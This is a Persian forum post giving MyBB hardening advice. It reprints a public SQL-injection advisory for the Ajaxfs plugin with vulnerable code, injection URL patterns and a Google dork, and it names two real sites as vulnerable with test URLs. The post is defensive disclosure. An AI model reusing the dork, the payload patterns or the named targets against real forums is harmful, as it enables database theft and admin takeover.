انجمن های تخصصی فلش خور
راه مقابله با Hک سایت ها 3 - نسخه‌ی قابل چاپ

+- انجمن های تخصصی فلش خور (http://www.flashkhor.com/forum)
+-- انجمن: رایانه (http://www.flashkhor.com/forum/forumdisplay.php?fid=27)
+--- انجمن: امنیت و روش های مقابله با هـک (http://www.flashkhor.com/forum/forumdisplay.php?fid=85)
+--- موضوع: راه مقابله با Hک سایت ها 3 (/showthread.php?tid=264710)

راه مقابله با Hک سایت ها 3 - امیر‌حسین - 06-03-2017

امروز چندتا اسکریپت نه چندان جدید ولی کار آمد برای حملات تکذیب سرویس MYBB رو بررسی کردم بد نیست توضیحی در موردش بدم :



مدتی قبل گروه Hک سیتی یک اسکریپت واسه تکذیب سرویس برای سیستم انجمن ساز MYBB نوشت که بر اساس پRوکSی اتک میداد و سایت Down میشد .



هدف حملات برای ارسال درخواست :



calendar.php



بود ، حالا یه سری تیم ها که اسمشونم نمیبرم با الهام گرفتن از همون شیوه حملات خودشونو تغییراتی دادند که بد نیست این قسمت ها رو برای مهمانان غیر فعال کنید و یا کلا غیر فعال کنید .



calendar.php

misc.php

و ....



البته جلوی این جملاتو به این راحتی ها نمیشه گرفت ولی با کانفیگ صحیح وب سرور و نصب یک فایروال با کانفیگ خود میشه تا حدودی جلوی این حملاتو گرفت که در جلسات بعدی در موردش توضیح میدم .



-----



یکی از دوستان پیام داده بود که سرورشو چک کردن و 3 4 تا از سایتهای روی سرورش مورد نفوذ قرار گرفته بود .



امنیت سرور شما در حد مطلوبی نیست ، اگر وبسایت شما مشترکان تخصصی داره بهتره سرورتون رو ارتقا بدید تا یه وقتی شیطون نشن





رنج IP بدید مثلا :




<files index.php>


order allow,deny


allow from 198.168


</files>






اخیرا آسیب پذیری جدید برای پلاگین AJAX FS پابلیک شده که SQLI میباشد .





نفوذ گر با استفاده از این آسیب پذیری میتواند اطلاعات مدیریت را از دیتابیس استخراح نماید مثل یوزر و پسورد مدیریت :








کد:

کد:
###########################

# Mybb Ajaxfs Plugin Sql Injection vulnerability

###########################

#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################
  
# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
  
# Author : Iranian Exploit DataBase
  
# Discovered By : IeDb
  
# Email : [email protected]  -  [email protected]
  
# Home : http://iedb.ir   -   http://iedb.ir/acc
  
# Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
  
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
  
# Security Risk : High
  
# Tested on : Linux
  
# Dork : inurl:ajaxfs.php
  
#################################
  
1)
  
  if(isset($_GET['tooltip']))
    {
    $pid=$_GET['tooltip'];
    $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
  
  
2)
  
if(isset($_GET['usertooltip']))
    {
    $uid=$_GET['usertooltip'];
    $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
  
http://localhost/Upload/ajaxfs.php?usertooltip=1'
  
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
  
Google DORK : inurl:ajaxfs.php
  
  
# Exploit :
  
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
  
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
  
  
#################################
  
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
  
#################################




هر چند از ثبت کننده این آسیب پذیری خیلی خوشم نمیاد اما آسیب پذیری هست که پابلیک شده و وظیفه ما ایجاب میکنه برای وبسایت های ایرانی اطلاع رسانی انجام بدیم .





لینک پلاگین از سایت مرجع :





دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
http://mods.mybb.com/download/ajax-forum-stat-v-2





لینک اکسپلویت در سایت Exploit-DB :





دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
http://www.exploit-db.com/exploits/29797





دموی نفوذ به وبسایت از طریق این آسیب پذیری :





دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
https://www.youtube.com/watch?v=8BrqkHwMr6c





از جمله از وبسایت هایی که از این پلاگین استفاده میکنند و آسیب پذیر میباشند :





دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
http://forum.kardoonline.com/ajaxfs.php?tooltip=939%27


دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
http://airguns-club.ir/ajaxfs.php?tooltip=805%27


و .....





اگر صفحات لاگین باز باشد با استخراج یوزر و پسورد هکر میتوانید با کرک کردن هش به سایت دسترسی پیدا کند . و البته از طریق اینجکشن میشه کل دیتابیس را Dump کرد .





جهت پیشگیری از این حملات فعلا این پلاگین تا ارائه نسخه جدید غیر فعال شود دوستانی هم که احتیاج دارند بهش میتونند توی پیام خصوصی اعلام کنند تا آسیب پذیری براشون پچ بشه .




یا حق